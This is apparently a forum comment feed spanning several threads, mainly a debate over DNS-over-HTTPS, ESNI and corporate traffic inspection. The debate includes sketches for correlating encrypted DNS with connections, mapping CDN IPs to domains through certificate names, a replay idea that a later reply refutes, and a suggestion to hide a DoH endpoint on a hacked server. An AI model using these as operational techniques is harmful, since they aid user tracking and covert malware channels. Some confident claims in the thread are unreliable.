1. -2

    Perhaps I am being fussy, but it contains lots of silly mistakes.

    Takeaway 0.1.2.1 C is a compiled programming language. No, it can also be interpreted.

    Takeaway 0.1.2.2 A correct C program is portable between different platforms. No, this is a point of view.

    Takeaway 0.2.2.1 All identifiers in a program have to be declared. No, #ifdef ABC // check whether the identifier ABC is declared

    1. 3

      Takeaway 0.1.2.1 C is a compiled programming language. No, it can also be interpreted.

      True, you can say this about a lot of “compiled languages”, but all the C code I’ve run across is compiled. Yes, the author could have been more clear.

      Takeaway 0.1.2.2 A correct C program is portable between different platforms. No, this is a point of view.

      Portability isn’t a “point of view.” Your code either (builds and) runs or doesn’t (build and) run. There are a lot of factors involved in portability; I’m not sure you can say “this is portable” without actually trying it on your target platforms. There are the libraries involved; compilers/linkers for specific platforms might not implement certain things correctly; system libraries for your platforms might cause issues; the program might exceed the memory capacity of some platforms but not others; etc. There are things you can do to help portability, like not using compiler-specific language extensions, which I think is the author’s intent.

      Takeaway 0.2.2.1 All identifiers in a program have to be declared. No, #ifdef ABC // check whether the identifier ABC is declared

      True, ABC is an identifier; however, your example only checks whether ABC is an identifier declared as a macro name.
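
      A quick stand-alone sketch of that distinction (hypothetical file, any C compiler should do): `#ifdef` only sees names defined as macros, so an ordinary declared identifier is invisible to it.

      ```c
      /* #ifdef tests whether a name is defined as a MACRO,
         not whether it is declared as an identifier. */
      #include <stdio.h>

      int abc = 42;   /* 'abc' is a declared identifier, but not a macro */

      int main(void) {
      #ifdef abc
          puts("abc is defined as a macro");
      #else
          puts("abc is NOT defined as a macro");   /* this branch is taken */
      #endif

      #define ABC 1
      #ifdef ABC
          puts("ABC is defined as a macro");       /* this branch is taken */
      #endif
          return 0;
      }
      ```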

      1. 1

        Calling portability ‘correct’ is a point of view.

        “All identifiers” does not mean “all except macro …”

        1. 2

          Calling portability ‘correct’ is a point of view.

          I think “correct” is used here by the author with respect to the C language spec, since the following paragraph references language extensions.

          “All identifiers” does not mean “all except macro …”

          I agree with your point about identifiers. My point was that the example you provided as elaboration on your point (which is right in that ABC is considered an identifier in the #ifdef) has an incorrect comment. “// check whether the identifier ABC is declared” should be “// check whether the identifier ABC is declared as a macro name”. EDIT: Your example proves a good point! I don’t want it sullied because the comment isn’t entirely correct.

      2. 2

        I really dislike calling languages “compiled” and “interpreted”. It is only an implementation detail, and the fact that the majority of implementations do it one way or the other doesn’t change anything. Yes, the majority of C implementations do compile it, but you can also interpret it. The majority of Python implementations interpret it, but there are implementations that compile it (like Nuitka). It doesn’t matter how a language is implemented; it is not “compiled” or “interpreted” - the implementation is.

        1.  

          It’s interpreters all the way down. All compilation does is translate a program from one form to another.

          1.  

            Just nitpicking, but technically a language’s specification can make it “compiled” or “interpreted”, which is admittedly a rare case. Also, implementations can use some hybrid of interpretation and compilation, like a runtime or virtual machine.

        1. 4

          I just realized that this is over a month old. Hope it’s still ok for everyone.

          1. 16

            I’ve been waiting for like 6 years, so this is ok

            1. 4

              I’m pretty sure that is a prepared post, as I was setting up a Mumble server a week earlier and that website was a wiki-style one that only had 1.3.0 RCs. So yeah, this should actually be a proper recent release.

              Edit: also, github release message seems relevant https://github.com/mumble-voip/mumble/releases/tag/1.3.0

              1. 3

                Version 1.3.0 is the latest stable version of Mumble and was released on September 08, 2019.

                The download link was put up fairly recently though, so it still seems good.

                1. 3

                  Ah, that makes sense. I was hearing a lot of people mentioning this release yesterday, so I was confused when I saw the date.

              1. 7

                Still waiting for someone to explain what “security” this provides. They can still see the IPs you connect to. Just look for the next SYN packet after a response comes back from a known DoH endpoint…

                The one thing this standard does is create a backdoor to make it harder for you to filter content on your network (as required by law in some situations) and makes it harder for your security team to detect bots/malware/intrusions by triggering on lookups to known malware C&C servers. TLS 1.3 plus this means it’s extremely difficult especially for critical infrastructure (e.g., power generation companies) to filter egress traffic effectively.

                If you want to stay out of prison for dissenting, you need a VPN*. If you want privacy, use a VPN*. This doesn’t solve either; it only makes it possible to avoid naughty DNS servers that modify your responses. But we already had solutions for that.

                * and make sure the VPN is trustworthy or it’s an endpoint you control.
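
                To illustrate the correlation claim, here’s a toy sketch over an invented packet trace (every name, address and timestamp below is made up; a real tool would sniff with something like libpcap):

                ```c
                /* Correlate a DoH response with the next outbound SYN.
                   Records are hard-coded for illustration only. */
                #include <stdio.h>
                #include <string.h>

                struct pkt { double ts; const char *kind; const char *dst_ip; };

                /* Report destinations contacted within `window` seconds
                   of a response from a known DoH endpoint. */
                static void correlate(const struct pkt *p, int n, double window) {
                    for (int i = 0; i < n; i++) {
                        if (strcmp(p[i].kind, "doh_response") != 0) continue;
                        for (int j = i + 1; j < n && p[j].ts - p[i].ts <= window; j++) {
                            if (strcmp(p[j].kind, "syn") == 0)
                                printf("DoH lookup at %.2fs likely resolved to %s\n",
                                       p[i].ts, p[j].dst_ip);
                        }
                    }
                }

                int main(void) {
                    struct pkt trace[] = {
                        {0.00, "doh_response", "104.16.248.249"}, /* known DoH endpoint */
                        {0.03, "syn",          "93.184.216.34"},  /* inferred target */
                        {5.00, "syn",          "192.0.2.10"},     /* outside the window */
                    };
                    correlate(trace, 3, 1.0);
                    return 0;
                }
                ```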

                1. 7

                  No need to put scare-quotes on security. It hides DNS traffic. Along with eSNI it hides the domains you’re visiting. And if the domain uses a popular CDN, this makes the traffic very hard to spy on, which is a measurable improvement in privacy.

                  you need a VPN

                  Oh no, aren’t VPNs evil, because, as you said yourself, they make “it harder for you to filter content on your network (as required by law in some situations)”?

                  The false-sense-of-security traffic inspection middleboxes that were always easy to bypass with a VPN or even a SOCKS proxy were needlessly weakening TLS for decades. Fortunately, they’re dead now.

                  1. 1

                    VPNs are much easier to block. You can do it at the protocol level for most types (you’re whitelisting outbound ports and protocols, right?) then you have lists of the public VPN providers to block as well.

                    If you’re only allowing outbound TCP 443 and a few others someone could do TCP OpenVPN over it, but performance is terrible and it’s unreliable so most people don’t try.

                    Regardless, there are DPI devices which can fingerprint OpenVPN traffic and tell it apart from HTTPS traffic because it behaves differently (different send/receive patterns), and then you inject RST packets to break the session.

                  2. 4

                    Seeing the IPs that you connect to isn’t always useful; e.g., an attacker wouldn’t realistically gain anything if a website you connect to is served through Cloudflare, which serves enough different websites that it provides little information for the attacker.

                    1. 4

                      You can easily connect to the IP and grab the list of domains on the SAN certificate that CloudFlare is using on that IP address to figure out where they’re connecting. There’s only like 25 per certificate. It’s not hard to figure out if you are targeting someone.

                      e.g., it would not be difficult to map 104.18.43.206 to the CloudFlare endpoint of sni229201.cloudflaressl.com and once you have that IP to CloudFlare node mapping sorted out you can craft a valid request …

                      Subject Alternative Names: sni229201.cloudflaressl.com, *.carryingcoder.com, *.carscoloringpages101.com, *.caudleandballatopc.com, *.coloringpages101.com, *.cybre.space, *.emilypenley.com, *.indya101.com, *.nelight.co, *.scriptthe.net, *.shipmanbildelar.se, *.teensporn.name, *.thereaping.us, *.totallytemberton.net, *.voewoda.ru, *.whatisorgone.com, carryingcoder.com, carscoloringpages101.com, caudleandballatopc.com, coloringpages101.com, cybre.space, emilypenley.com, indya101.com, nelight.co, scriptthe.net, shipmanbildelar.se, teensporn.name, thereaping.us, totallytemberton.net, voewoda.ru, whatisorgone.com
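
                      Once you have the SAN string, the bookkeeping for such an IP-to-domains mapping is trivial. A toy sketch (fetching the certificate itself, e.g. via OpenSSL, is out of scope; the input is a shortened version of the list above):

                      ```c
                      /* Split a comma-separated SAN field into individual names,
                         the raw material for an IP -> domains mapping. */
                      #include <stdio.h>
                      #include <string.h>

                      int main(void) {
                          char san[] = "sni229201.cloudflaressl.com, *.cybre.space, cybre.space";
                          int count = 0;
                          /* strtok treats both ',' and ' ' as separators here */
                          for (char *tok = strtok(san, ", "); tok; tok = strtok(NULL, ", "))
                              printf("domain %d: %s\n", ++count, tok);
                          return 0;
                      }
                      ```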
                      
                      1. 2

                        This list is encrypted in TLS 1.3, so you can’t easily grab it anymore (Firefox and Cloudflare also support eSNI, which plugs another hole).

                        1. 1

                          You misunderstand. I would create a database mapping of all CloudFlare nodes in existence: sniXXXXXX.cloudflaressl.com <—> IP addresses.

                          When I see traffic to one of these IPs, I simply make a new TLS handshake to sniXXXXXX.cloudflaressl.com, grab the certificate, read all of the domain names in the certificate. I don’t need a plaintext SNI request to see where they’re going; I can just infer it by asking the same server myself.

                          1. 2

                            You’ll only learn that all Cloudflare customers share a handful of IP addresses, and there are millions of sites per IP.

                            The certificate bundles aren’t tied to an IP, and AFAIK even the bundles aren’t constant.

                            1. 1

                              The server publishes a public key on a well-known DNS record, which can be fetched by the client before connecting (as it already does for A, AAAA and other records). The client then replaces the SNI extension in the ClientHello with an “encrypted SNI” extension, which is none other than the original SNI extension, but encrypted using a symmetric encryption key derived using the server’s public key, as described below. The server, which owns the private key and can derive the symmetric encryption key as well, can then decrypt the extension and therefore terminate the connection (or forward it to a backend server). Since only the client, and the server it’s connecting to, can derive the encryption key, the encrypted SNI cannot be decrypted and accessed by third parties.

                              That’s fine, then someone will just excise the encrypted SNI part to use it in a crafted packet that’s almost like a replay attack. That will still get you the list of 25ish domains they could have accessed.

                              Hell, this looks like you could eventually build rainbow tables out of your captured SNI packets once you have sorted through the available metadata to see where the user went. (Assuming CF doesn’t rotate these keys regularly.) Just analyze all sites on that cert, see all the 3rd-party domains you need to load, and you can figure it out.

                              This is a small hurdle for a state actor

                              edit: I’m pretty sure you can just do a replay of the SYN to CloudFlare and not worry about trying to rip out the SNI part to get the correct certificate (TCP Fast Open)

                              edit2:

                              7.5.1.  Mitigate against replay attacks
                              
                                 Since the SNI encryption key is derived from a (EC)DH operation
                                 between the client's ephemeral and server's semi-static ESNI key, the
                                 ESNI encryption is bound to the Client Hello.  It is not possible for
                                 an attacker to "cut and paste" the ESNI value in a different Client
                                 Hello, with a different ephemeral key share, as the terminating
                                 server will fail to decrypt and verify the ESNI value.
                              

                              Yeah you can’t replay the ESNI value, but if you replay the entire Client Hello I think it should work. The server won’t know the client’s “ephemeral” ESNI key was re-used.

                              https://datatracker.ietf.org/doc/draft-ietf-tls-esni/?include_text=1

                              1. 4

                                The ClientHello ideally only contains a client’s public key material, so you can’t decrypt the ESNI even if you replay the ClientHello. Unless you use a symmetric DH operation (which is rare and not included in TLS 1.3) or break ECDH/EdDH/ECDHE.
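
                                A toy numeric illustration of that point (deliberately insecure made-up parameters, plain modular DH rather than the elliptic-curve exchange TLS 1.3 actually uses): each side derives the same key only because it holds a private exponent, and a replayer who captured only the public values has nothing to plug in.

                                ```c
                                /* Toy Diffie-Hellman: the shared key needs a PRIVATE exponent,
                                   which replaying a ClientHello never gives you. */
                                #include <stdio.h>
                                #include <stdint.h>

                                static uint64_t powmod(uint64_t b, uint64_t e, uint64_t m) {
                                    uint64_t r = 1; b %= m;
                                    while (e) { if (e & 1) r = r * b % m; b = b * b % m; e >>= 1; }
                                    return r;
                                }

                                int main(void) {
                                    const uint64_t p = 2147483647, g = 5;  /* toy params, NOT secure */
                                    uint64_t client_priv = 123456, server_priv = 654321;
                                    uint64_t client_pub = powmod(g, client_priv, p); /* in ClientHello */
                                    uint64_t server_pub = powmod(g, server_priv, p);

                                    /* Each side combines the OTHER side's public value
                                       with its OWN private exponent: */
                                    uint64_t k_client = powmod(server_pub, client_priv, p);
                                    uint64_t k_server = powmod(client_pub, server_priv, p);
                                    printf("keys match: %s\n", k_client == k_server ? "yes" : "no");

                                    /* An observer holds only client_pub and server_pub;
                                       without a private exponent there is no cheap way
                                       to compute the shared key. */
                                    return 0;
                                }
                                ```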

                                1. 2

                                  You are correct. I was going to post this after some coffee this morning. The response is encrypted with the client’s ephemeral ECDHE key.

                                  So this breaks this type of inspection.

                                  However, if you’re connecting to an endpoint that’s not on a CDN and is unique the observer can still figure out where you’re going. Is the solution we’re going to be promoting over the next few years to increase reliance on these CDN providers? I really don’t like what CloudFlare has become for many reasons, including the well known fact that nothing is free. They might have started with intentions of making a better web but wait until their IPO. Once they go public, all bets are off. All your data will be harvested and monetized. Privacy will ostensibly be gone.

                                  In America it’s illegal to make ethical choices if it doesn’t maximize shareholder value. (Ebay v Newmark, 2010)

                      2. 3

                        yes, and that protects exactly.. no one who needs it.

                        if you live somewhere where you need the security to hide your DNS requests, cloudflare will be the first thing to get blocked. the only really secure thing to do is onion routing of the whole traffic. centralizing the internet makes it more brittle.

                        additionally: ease of use is no argument if it means trading-off security. these tradeoffs put people in danger.

                        1. 3

                          As someone who barely knows his TCPs from his UDPs, I had to read up on DoH, and I must say that a technology must be doing something right if it elicits both your reaction and the following from the Wikipedia article:

                          The Internet Watch Foundation and the Internet Service Providers Association (ISPA)—a trade association representing UK ISPs, criticised Google and Mozilla for supporting DoH, as they believe that it will undermine web blocking programs in the country, including ISP default filtering of adult content, and mandatory court-ordered filtering of copyright violations.

                          1. 3

                            i think DoH is the wrong solution for this problem, stuffing name resolution into an unrelated protocol. it may be true that it has the side-effect of removing the ISP-DNS-filters, but those can already be circumvented by using another name server.

                            a better solution would be to have a better UI to change the nameservers, possibly in connection with DNS over TLS, which isn’t perfect, but at least it isn’t a mixture of protocols which DoH is.

                            it could be an argument that the ISP could block port 53, and DoH would fix that. then we have another problem, namely that the internet connection isn’t worth its name. the problem with these “solutions” is that they will become the norm, and then the norm will be to have a blocked port 53. it’s a bit like the broken windows theory, only with piling complexity and bad solutions.

                            maybe that’s my problem with it: DoH feels like a weird kludge like IP-over-ICMP or IP-over-DNS to use a paid wifi without paying.

                            1. 2

                              maybe that’s my problem with it: DoH feels like a weird kludge like IP-over-ICMP or IP-over-DNS to use a paid wifi without paying.

                              I agree with you that it feels like a kludge, it feels icky to me too.

                              But it’s something that could lead to a better internet - at the moment DNS traffic is both unencrypted, but more importantly, unauthenticated. If a solution can be found that improves this, even if it’s a horrible hack, I think it’s a net win.

                              Internet networking, like politics, is the art of the possible. We can all dream of a perfect world not beholden to vast corporate interests at every level of the protocol stack, but in the meantime the best we can hope for is to leverage some vast corporate interests against others.

                              1. 2

                                But it’s something that could lead to a better internet - at the moment DNS traffic is both unencrypted, but more importantly, unauthenticated. If a solution can be found that improves this, even if it’s a horrible hack, I think it’s a net win.

                                It may be a short term win, but in the end we are stuck forever with another bad protocol because nobody took the time and effort to build a better one, or just had an agenda.

                                Internet networking, like politics, is the art of the possible. We can all dream of a perfect world not beholden to vast corporate interests at every level of the protocol stack, but in the meantime the best we can hope for is to leverage some vast corporate interests against others.

                                DoH is just another way of centralizing the net. sure you can set another resolver in the settings, but for how long? you’d have to do that on every device, or use the syncing functionality, which is.. centralized. and even then, who does that?

                                i don’t think that “big players”, in politics or in tech, do things out of altruistic reasoning, but, in the best case, for the good old dollar. that paired with most of the things being awful hacks (again, in both politics and tech) paints a bright future.

                                1. 2

                                  I mean, the reality we live in now, where a company like Cloudflare has a de-facto veto on Internet content, just grew organically. It’s an inevitable consequence of technical progress: as stuff (like hosting, and DDoS protection) gets commoditized, economies of scale mean large companies are the only ones who have a hope of making a profit.

                                  To their credit, Cloudflare seem aware and uncomfortable about their role in all this, but that’s scant consolation as they’re under the same profitability requirements as the rest of the free world. They can be sold, or move to “evil” to save their profits.

                                  1. 3

                                    Yep - even prior to DoH, Cloudflare have BGP announce privileges and can issue certificates which are trusted by browsers, two powers which should never have been combined in the same entity (being able to funnel a site’s traffic to your servers and also generate valid certs for those requests).

                                    1. 2

                                      I mean, the reality we live in now, where a company like Cloudflare has a de-facto veto on Internet content, just grew organically.

                                      … and with their resolver being the default one they even have control over the rest, amazing!

                                      It’s an inevitable consequence of technical progress, as stuff (like hosting, and DDoS protection) gets commoditized efficiencies of scale make large companies are the only ones who have a hope of making a profit.

                                      the need for something like DDoS protection is more a consequence of full-throttle capitalism ;)

                                      1. 1

                                        with their resolver being the default one

                                        For the fraction of internet users running Firefox, sure. Google will handle the rest. No doubt MSFT will hop on board too.

                                        the need for something like DDoS protection is more a consequence of full-throttle capitalism

                                        Or technical debt inherited from a more trusting vision of the internet…

                                        (edit addressed Cloudflare’s role as default DoH provider for Firefox)

                              2. 2

                                UK ISPs have to block child porn or the CEO will be held accountable and go to prison. They do DNS filtering, because IP filtering is impossible. Now they can’t even do that.

                                1. 5

                                  I’m aware of the legal requirements of UK ISPs (although why they feel they need to celebrate this requirement by awarding (then withdrawing) the “Internet Villain of the Year” to Mozilla is beyond me).

                                  I guess the “responsibility” for filtering/blocking will move up to Cloudflare.

                                  1. 1

                                    we’ve had a lengthy political discussion in germany about this topic (where “filtering” was for a long time the preferred political solution); now the policy is to ask the respective hoster to delete these things. i have no good english source for this, so here is the translated german wikipedia article (original)

                                    1. 3

                                      You can push the ISP to DNS block it (though it’s harder and usually leads to years-long court cases as in Vodafone’s case).

                                      Telekom also loves to push their own search engine with advertisements for NXDOMAIN responses.

                            2. 3

                              Still waiting for someone to explain what “security” this provides. They can still see the IPs you connect to. Just look for the next SYN packet after a response comes back from a known DoH endpoint…

                              It does one useful thing: It prevents them from MITMing these packets and changing them.

                              I’d like encrypted DNS, but I’m very strongly against Firefox selecting my DNS resolver for me for reasons that have already been stated in threads here. I also strongly prefer keeping the web stack out of my relatively simple client-side DNS resolver. Diverse ecosystems are important, and the only way to maintain them is to keep software simple enough that it is cheap to implement.

                              1. 1

                                It does one useful thing: It prevents them from MITMing these packets and changing them.

                                Sure, but that’s rare. It would require a targeted attack or a naughty ISP to be altering results.

                                What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver. Now you have zero control over the client devices on your network when it comes to DNS, and additionally we’re about to lose HTTPS inspection in the near future. This is the wrong approach to solve the problem. Admins need controls and visibility to secure their networks.

                                Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                It will be almost impossible now to stop users or bad guys from accessing Dropbox, for example. “Secure the endpoints” is not the answer. You can secure them, deny BYOD, etc, but you have to assume they’re compromised and/or rooted. Only the network is your source of truth about what’s really happening and now we’re losing that.

                                1. 4

                                  I guess I don’t have much sympathy for the argument that network administrators will lose insight into the traffic on their networks. That seems like a bonus to me, despite the frustration for blue teams.

                                  1. 3

                                    Same. I understand that in some places there are legal auditing requirements, but practically everywhere else it’s just reflexive hostility towards workers that makes us use networks that are pervasively censored and surveilled.

                                  2. 4

                                    Sure, but that’s rare. It would require a targeted attack or a naughty ISP to be altering results.

                                    Except that it’s not rare. You will find this in many hotel wifis. This hits you particularly hard if you have a DNSSEC-validating resolver, which doesn’t take kindly to these manipulations. Having a trusted recursor is generally important if you want to be sure that you talk to a resolver you can actually trust, which is in turn important if you want to delegate validation.

                                    What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver.

                                    Just as HTTPS prevents you from forcing your clients to talk to an on-premises cache or whatever. The solution is the same in both cases: you need to intercept TLS, if this is a hard requirement for you. DoH and DoT aren’t making anything more complicated; they’re just bringing DNS on par with the protection level we have had for other protocols for a while.

                                    1. 3

                                      You hit the nail on the head here. Far from being rare, in the US it’s ubiquitous, whether it’s your hotel, your employer, or your residential ISP.

                                    2. 3

                                      Only the network is your source of truth about what’s really happening and now we’re losing that.

                                      Good. Corporate networks must die. “Secure the endpoints” is THE ONLY answer.

                                      https://beyondcorp.com

                                      If Google can pull it off at Google scale, so can you. Small teams with lots of remote people have always been Just Using The Internet with authentication. It’s the “Enterprise”™ sector that’s been suckered into buying “Security Products”™ (more like “Spying Products”) to keep trying to use this outdated model.

                                      1. -1

                                        You clearly know nothing about running critical infrastructure networks, so please refrain from making these types of comments.

                                      2. 2

                                        What it most certainly does is prevent me from forcing clients to use my on-premises DNS resolver.

                                        Could you please elaborate? Is this about a “non-canonical” local resolver or do you think it also has repercussions for locally hosted zones? For example *.internal.example.org locally versus *.example.org on the official internet. Or did I misunderstand you and you just meant a local forwarding resolver?

                                        I honestly didn’t read up enough on DoH yet, just wondering.

                                        1. 1

                                          Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                          Set up your own DoH server and you can once again inspect it. Ideally you use a capable and modern TLS-intercepting box to inspect all traffic going in and out (as well as caching it).

                                          1. 1

                                            Mark my words, as soon as this is supported by a few different language libraries you’ll see malware and all sorts of evil things using it to hide exfiltration and C&C because it will be hidden in the noise of normal user traffic.

                                            How? The IP or the URL of the DoH server you are talking to will stand out like a signal flare… I think that dumping the file to a cloud-service is way more efficient, easier and effective.

                                            1. 1

                                              The US Gov often gives the security teams of Critical Infrastructure networks early reports with details on all sorts of potential attacks, including early heads up on malware that may or may not be targeted. This includes a list of C&C domains that may be accessed. If the software can hide its DNS requests by making them look like normal HTTPS traffic to CloudFlare, that makes it even harder to identify the malware’s existence on your network.

                                              If you want the Russians or Chinese to hack our grid, this is a great tool for them along with TLS 1.3. The power generation utility that I worked at did HTTPS interception and logging of ALL HTTPS and DNS requests from every device everywhere for analysis (and there was a program coming online to stream it to the government for early detection) and now this is becoming impossible.

                                              1. 1

                                                This pertains only to firefox… So why would an installation of firefox be on one of those networks?

                                                Furthermore: You know the ip of cloudflare’s DoH server. You could just block that and be done with it right? If the malware uses some other server, that will show up as well.

                                                1. 2

                                                  Firefox won’t be on that network, but HTTPS certainly will be. Likely not on (hopefully still airgapped) SCADA, but on other sensitive networks that give some level of access into SCADA through various means.

                                                  The point is that as DoH thrives and becomes commonplace and someone like CloudFlare runs this service, it’s easy to hide DNS requests mixed in with normal looking HTTPS traffic. The client can be a python script with DoH capability.

                                                  As for CloudFlare’s DoH service – it appears to be running on separate IPs at the moment, but there’s no reason why they couldn’t put this on their normal endpoints. DoH is HTTPS, so why not share it with their normal CDN endpoints? This would not be difficult to do in Nginx. In fact this would be far simpler than running HTTPS and SSH on the same port, which is also possible.

                                                  Basically any normal-looking HTTPS endpoint could become a DoH provider. Hack some inconspicuous server, reconfigure their webserver to accept DoH too, and now you’ve got the backdoor you need for your malware.

                                                  CloudFlare and Firefox are not my concern; DoH as a whole is.
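
                                                  For what it’s worth, a minimal sketch of that idea in Nginx (all names here are invented; it assumes a DoH-capable resolver such as a dns-over-https proxy listening locally, since Nginx itself only reverse-proxies in this sketch):

                                                  ```nginx
                                                  # Hypothetical: serve DoH and ordinary CDN traffic from one endpoint.
                                                  server {
                                                      listen 443 ssl http2;
                                                      server_name cdn.example.com;           # invented name

                                                      location /dns-query {                  # RFC 8484 DoH path
                                                          proxy_pass http://127.0.0.1:8053;  # assumed local DoH resolver
                                                      }
                                                      location / {
                                                          proxy_pass http://content_backend; # normal CDN traffic
                                                      }
                                                  }
                                                  ```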

                                                  1. 1

                                                    As for CloudFlare’s DoH service – it appears to be running on separate IPs at the moment, but there’s no reason why they couldn’t put this on their normal endpoints. DoH is HTTPS, so why not share it with their normal CDN endpoints? This would not be difficult to do in Nginx. In fact this would be far simpler than running HTTPS and SSH on the same port, which is also possible.

                                                    Fair point…

                                                    But now I’m wondering why you would have access to Cloudflare on such a network… Or why there wouldn’t be a root certificate on all the machines (and Firefoxes) in the network so that the organization can MITM all outgoing traffic?

                                                    1. 1

                                                      There are going to be some networks running servers that need outbound HTTPS for various reasons, but a lot of that can be locked down. But what about the network that the sysadmins are on? They need full outbound HTTPS, and a collaborating piece of malware on one of their machines gives them access to the internet and to other internal sensitive networks. These types of attacks are always complex and targeted. Think of the incredible work we did with Stuxnet.

                                                      As for MITM the traffic… look at this thread where it’s being discussed further https://lobste.rs/s/pechdy/turn_off_doh_firefox_now#c_inbnse

                                                      1. 1

                                                        There are going to be some networks running servers that need outbound HTTPS for various reasons, but a lot of that can be locked down.

                                                        So why cloudflare? I doubt you’d need any high-volume sites that use cloudflare for those setups.

                                                        But what about the network that the sysadmins are on? They need full outbound HTTPS, and a collaborating piece of malware on one of their machines gives them access to the internet and to other internal sensitive networks. These types of attacks are always complex and targeted. Think of the incredible work we did with Stuxnet.

                                                        If the networks really are that sensitive, just separate them physically, give the sysadmins two machines and never transport data in digital form from the one to the other….

                                                        If you are not willing to take these kinds of steps, your internal networks simply aren’t that critical.

                                                        1. 2

                                                          That is not how the networks at our power utilities work. And it’s not how the employees operate either.

                                                          1. Many power companies refuse to implement new technologies or network topologies unless another utility does it first. Which sadly means that in certain regions like MISO you can expect most of the utilities to be using the same firewalls, etc etc. Very dumb. Can’t wait for Russia to abuse this and take down half the country.

                                                          2. The people who work there aren’t the brightest. “Why are user accounts being managed with a perl script that overwrites /etc/passwd, /etc/shadow, and /etc/group?” Well, because that’s the way they’ve always done it, so if your team needs to install a webserver you also need to tell them to add the www user to their database so the user account doesn’t get removed. “Why are the admins ssh-ing as root everywhere with a DSA key that has no passphrase protection?” Because the admins (with 20 years of experience) refuse to learn ssh-agent and use basic security practices. I had meetings with developers who needed their application to be accessible across security domains, and the developer couldn’t tell me what TCP port their application used. “What’s a port?” These are people making 6 figures and doing about 30 minutes of work a day. It’s crazy.

                                                          3. These are highly regulated companies with slim margins. You want these kinds of drastic changes to their infrastructure? You better start convincing people to nationalize the grid because they don’t have the money to do it. Remember, it takes about 3 years to get a utility rate change approved. It’s a long process of auditing and paperwork and more auditing and paperwork to prove to the government that they really do need to increase utility rates to be able to afford X Y and Z in the future. They’re slow moving. Very slow.

                                                          4. Do you think customers will want their power bills to go up just so they can hire competent IT staff? Not a chance. (What we really need to do is stop subsidizing bulk power customers and making normal residential customers pay more than their fair share, but that’s a different discussion)

                                                          tl;dr we can all wish hope and pray that companies around the world will do the right thing, but it’s not going to happen anytime soon, especially in Critical Infrastructure environments because they’re so entrenched in their old ways and don’t have the budgets to do it the right way regardless.

                                                          1. 1
                                                            1. In utility companies, the production networks running the power plants should simply not come into contact with the internet. There should always be a human in between the network and the internet. If this is not the case, they deserve what’s coming.

                                                            2. Believe it or not, I can actually understand why they dump into /etc/group, /etc/passwd, and /etc/shadow. There is no chance of any machine having outdated users by accident or through partial configuration this way, and if your network has only a few hundred users, who are all more or less trained to deal with complex technological systems on a basic level, why not? It’s not like they are running a regular common office workplace.

                                                            However, what you are telling me about SSH and TCP is quite shocking. That is just plain incompetence.

                                                            1. I’m not living in the US. In fact, the last time I was there I was at an age from which I can barely remember anything other than that the twin towers still stood. I am often told that it’s a different country now, so I can’t say anything useful about this.

                                                            2. Depends… If outages average fewer than about 2 short power outages per year, then no, I wouldn’t.

                                                            If it starts to escalate to one outage per month and 25% of them can be blamed on incompetent IT-staff? You’ve reached the point where I am going to install my own diesel generators as those will quickly become profitable.

                                                2. 1

                                                  I don’t quite understand. Regardless of the TLS version, if you want to inspect https you need to intercept and decrypt outgoing https traffic via a middlebox. This applies to regular https just as it applies to DoH. If you are required to secure your network by inspecting encrypted traffic, you will continue to do so just like you’ve always done. In this sense, DoH is even less intrusive than, say, DoT, because your standard https intercept proxy can be adapted to deal with it.

                                                  1. 1

                                                    Wasn’t the goal of TLS 1.3 to make interception impossible? I am certain that was one of the major goals, but I didn’t follow the RFC’s development.

                                                    How would interception work? With ESNI in TLS 1.3, the client does a DNS lookup to retrieve the key to encrypt the ESNI request with. The middlebox couldn’t decrypt the ESNI and generate a certificate by the local trusted CA because it doesn’t know the hostname the client wants to access. So now… a middlebox will also have to be a DNS server so it can capture the lookup for the ESNI key, generate a fake key on demand, and have it ready when the TLS connection comes through and is intercepted?

                                                    This is getting quite complex, and there may be additional middlebox-defeat features I’m not aware of.

                                                    1. 1

                                                      No, the basic handshake can still be intercepted similarly to TLS 1.2, so that’s not a problem with 1.3.

                                                      ESNI might be a slightly different issue. But you could just take a hardline stance and drop TLS handshakes which use ESNI and filter the ESNI-records (with a REFUSED error?) in your resolver. If you need to enforce TLS intercept, you will need to enforce interceptability of that traffic, and that might mean refusing TLS handshakes which use ESNI. But I haven’t read the RFC drafts yet, so there might be easier/better ways to achieve this. In any case, none of this should be a deal breaker. TLS intercept proxies have always been disruptive (e.g. client certificates cannot be forwarded past an intercept proxy) and this will apply to ESNI just as it has done to past aspects of TLS.

                                                      What I feel should be clear is that none of this will suddenly render existing practices impossible. Restrictive environments will continue to be able to be restrictive, just as they have in the past. The major difference will hopefully be that we will be safer by default even in open networks, such as public wifis, where a large number of users are currently exposed to unnecessary risks.

                                                      1. 1

                                                        ESNI might be a slightly different issue. But you could just take a hardline stance and drop TLS handshakes which use ESNI and filter the ESNI-records (with a REFUSED error?) in your resolver. If you need to enforce TLS intercept, you will need to enforce interceptability of that traffic and that might mean refusing TLS handshakes which use ESNI.

                                                        I don’t think this is possible. TLS 1.3 means ESNI is a given. If half the internet uses TLS 1.3-only, you have no choice but to support it. AIUI they’ve gone to great lengths to prevent downgrade attacks which will stop the interception.

                                                        I have a contact at BlueCoat and am reaching out to see what the current state is because their speciality is exactly this.

                                                        1. 1

                                                          TLS 1.3 means ESNI is a given.

                                                          Right now, ESNI is not mandatory for TLS 1.3. TLS 1.3 is a complete and published RFC standard. ESNI is only a draft and is certainly not mandated by TLS 1.3. You don’t need to run downgrade attacks to “intercept” TLS 1.3. Intercept proxies simply complete the TLS handshake by returning a certificate for a given domain issued by a custom CA that’s (hopefully) in the client’s trust store. This works just the same for 1.3 as it does for any earlier method.

                                                          1. 1

                                                            Do we know what the failure mode is if ESNI is rejected? Everyone wants ESNI for their privacy and browsers will certainly implement it, so I suspect it will be more common than not.

                                                            edit: and thanks, I was still operating under the impression that ESNI was part of the final TLS 1.3 draft. I haven’t taken the time to read through it all and there’s a lot of misinformation out there. I’ve been too busy to dig in deeper, and security is not my day job right now.

                                        1. 7

                                          Probably the introduction should have been submitted instead: https://www.caniemail.com/news/2019-09-09-introducing-caniemail/

                                          1. 7

                                            Because it is your computer that runs the code, you can use a lot of different techniques. But that may also cause a problem: you can use any algorithm as long as it fits within the given timeout. This means that if you have the hardware for it, you could train a neural net with 1M parameters and run it against others. You would probably win, but at a cost. Basically, I think this could create a pay-to-win problem.

                                            1. 4

